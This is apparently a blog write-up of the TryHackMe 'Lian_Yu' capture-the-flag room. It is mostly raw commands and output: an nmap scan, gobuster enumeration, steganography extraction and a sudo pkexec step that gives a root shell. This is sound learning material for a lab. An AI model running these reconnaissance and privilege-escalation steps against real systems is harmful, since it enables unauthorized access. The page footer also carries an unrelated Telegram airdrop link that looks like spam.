WriteUp — THM Lian_Yu

Photo by Michael on Unsplash
nmap -sC -sV -p- 10.10.61.139 1 ⨯
Starting Nmap 7.80 ( https://nmap.org ) at 2020–10–13 12:51 EEST
Nmap scan report for 10.10.61.139
Host is up (0.055s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
| 1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| 2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| 256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_ 256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open rpcbind 2–4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 41886/tcp status
| 100024 1 44506/tcp6 status
| 100024 1 49721/udp status
|_ 100024 1 55595/udp6 status
41886/tcp open status 1 (RPC #100024)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.11 seconds
gobuster -q -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.61.139/ dir
/island (Status: 301)
The Code Word is: </p><h2 style="color:white"> vigilante</h2>
seq -w 0 9999 > numbers.txt
gobuster -q -w numbers.txt -u http://10.10.61.139/island dir
/2100 (Status: 301)
<!-- you can avail your .ticket here but how?   -->
gobuster -q -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x ticket -u http://10.10.61.139/island/2100 dir
/green_arrow.ticket (Status: 200)
This is just a token to get into Queen's Gambit(Ship)


__REDACTED__
exiftool Leave_me_alone.png
ExifTool Version Number : 12.07
File Name : Leave_me_alone.png
Directory : .
File Size : 500 kB
File Modification Date/Time : 2020:10:13 14:39:01+03:00
File Access Date/Time : 2020:10:13 14:39:30+03:00
File Inode Change Date/Time : 2020:10:13 14:39:01+03:00
File Permissions : rw-r — r —
Error : File format error
steghide extract -sf aa.jpg 
Enter passphrase:
wrote extracted data to “ss.zip”.
THM{__REDACTED__}
cat .Important 
What are you Looking for ?
root Privileges ?try to find Secret_Mission
find / -iname “*Secret_Mission” 2>/dev/null
/usr/src/Secret_Mission
sudo -l
[sudo] password for slade:
Matching Defaults entries for slade on LianYu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
(root) PASSWD: /usr/bin/pkexec
sudo pkexec /bin/sh
# whoami
root

--

--

--

CTO by day, learning cybersecurity by night.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Is There A Metal API To Get Hourly Aluminum Rates?

Words of 5 letters begin on SVI — Wordle Help

My Reflections on Andela’s EPIC Values

Notifications Extensions-Using Both Service and Content Extensions

https://t.me/BambooPanda_Airdrop_bot?start=r01658739020

The Water is Freezing Cold.

4 Developers and Regional Representative Join Ambrosus

Cassandra Query Observability with Libpcap and Protocol Observer

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Jari Laurila

Jari Laurila

CTO by day, learning cybersecurity by night.

More from Medium

TryHackMe | Overpass 2 — Hacked

Hack the Box — Cronos Writeup

Daily Bugle TryHackMe Write-Up

Intigriti -1337up CTF — Warmup Encoder writeup